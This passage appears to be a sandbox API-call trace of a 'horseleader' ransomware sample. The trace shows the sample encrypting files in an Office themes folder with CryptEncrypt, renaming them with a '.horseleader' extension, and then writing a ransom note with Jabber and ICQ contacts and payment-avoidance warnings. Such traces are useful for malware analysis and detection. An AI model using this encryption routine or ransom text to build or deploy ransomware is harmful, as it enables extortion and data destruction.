dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.071] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 80 [0248.071] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0248.071] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1737) returned 1 [0248.071] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x6c9, lpOverlapped=0x0) returned 1 [0248.073] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff937, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.073] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x6c9, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x6c9, lpOverlapped=0x0) returned 1 [0248.073] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.073] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.073] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.074] CloseHandle (hObject=0x1a4) returned 1 [0248.074] GetProcessHeap () returned 0x780000 [0248.074] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.074] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.horseleader") returned 92 [0248.074] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.horseleader")) returned 1 [0248.075] GetProcessHeap () returned 0x780000 [0248.075] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.075] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d180d00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5abe1b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2d180d00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xe232, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="STRTEDGE.ELM", cAlternateFileName="")) returned 1 [0248.075] lstrcmpiW (lpString1="STRTEDGE.ELM", lpString2="Windows") returned -1 [0248.075] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM") returned 81 [0248.076] StrStrIW (lpFirst="STRTEDGE.ELM", lpSrch=".horseleader") returned 0x0 [0248.076] lstrcmpW (lpString1="STRTEDGE.ELM", lpString2="#Decrypt#.txt") returned 1 [0248.076] lstrcmpW (lpString1="STRTEDGE.ELM", lpString2="_uninstalling_.png") returned 1 [0248.076] lstrlenW (lpString=".testttjffg") returned 11 [0248.076] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM", lpSrch=".testttjffg") returned 0x0 [0248.076] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.076] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.076] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.077] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM") returned 81 [0248.077] StrStrW (lpFirst="STRTEDGE.ELM", lpSrch=".txt") returned 0x0 [0248.077] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=57906) returned 1 [0248.077] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.080] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.081] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.081] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.082] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0248.082] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.082] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4232, lpOverlapped=0x0) returned 1 [0248.082] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbdce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.082] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4232, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4232, lpOverlapped=0x0) returned 1 [0248.083] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.083] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.083] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.083] CloseHandle (hObject=0x1a4) returned 1 [0248.083] GetProcessHeap () returned 0x780000 [0248.083] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.083] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM.horseleader") returned 93 [0248.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.elm.horseleader")) returned 1 [0248.087] GetProcessHeap () returned 0x780000 [0248.087] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.087] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d3f0bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x271, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="STRTEDGE.INF", cAlternateFileName="")) returned 1 [0248.087] lstrcmpiW (lpString1="STRTEDGE.INF", lpString2="Windows") returned -1 [0248.087] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF") returned 81 [0248.087] StrStrIW (lpFirst="STRTEDGE.INF", lpSrch=".horseleader") returned 0x0 [0248.088] lstrcmpW (lpString1="STRTEDGE.INF", lpString2="#Decrypt#.txt") returned 1 [0248.088] lstrcmpW (lpString1="STRTEDGE.INF", lpString2="_uninstalling_.png") returned 1 [0248.088] lstrlenW (lpString=".testttjffg") returned 11 [0248.088] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF", lpSrch=".testttjffg") returned 0x0 [0248.088] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.088] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.088] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.089] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF") returned 81 [0248.089] StrStrW (lpFirst="STRTEDGE.INF", lpSrch=".txt") returned 0x0 [0248.090] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=625) returned 1 [0248.090] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x271, lpOverlapped=0x0) returned 1 [0248.091] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffd8f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.091] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x271, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x271, lpOverlapped=0x0) returned 1 [0248.091] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.091] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.092] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, 
lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.092] CloseHandle (hObject=0x1a4) returned 1 [0248.092] GetProcessHeap () returned 0x780000 [0248.092] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.092] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF.horseleader") returned 93 [0248.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.inf.horseleader")) returned 1 [0248.093] GetProcessHeap () returned 0x780000 [0248.093] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.093] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x82c7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.093] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.094] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 81 [0248.094] StrStrIW 
(lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.094] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.094] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.094] lstrlenW (lpString=".testttjffg") returned 11 [0248.094] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.094] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.094] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.094] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.095] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 81 [0248.095] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.095] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=33479) returned 1 [0248.096] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.099] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.099] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.099] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x32c7, lpOverlapped=0x0) returned 1 [0248.100] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffcd39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.100] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x32c7, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x32c7, lpOverlapped=0x0) returned 1 [0248.100] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.100] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.100] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.100] CloseHandle (hObject=0x1a4) returned 1 [0248.101] GetProcessHeap () returned 0x780000 [0248.101] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.101] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.horseleader") returned 93 [0248.101] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), 
lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.horseleader")) returned 1 [0248.102] GetProcessHeap () returned 0x780000 [0248.102] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.102] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x82c7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0248.102] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.102] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\#Decrypt#.txt") returned 82 [0248.102] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.103] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0248.103] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.105] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.105] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.105] CloseHandle (hObject=0x158) returned 1 [0248.105] 
GetProcessHeap () returned 0x780000 [0248.105] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.105] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="STUDIO", cAlternateFileName="")) returned 1 [0248.105] lstrcmpiW (lpString1="STUDIO", lpString2="Windows") returned -1 [0248.105] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO") returned 66 [0248.105] lstrcmpW (lpString1="STUDIO", lpString2=".") returned 1 [0248.105] lstrcmpW (lpString1="STUDIO", lpString2="..") returned 1 [0248.105] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO", 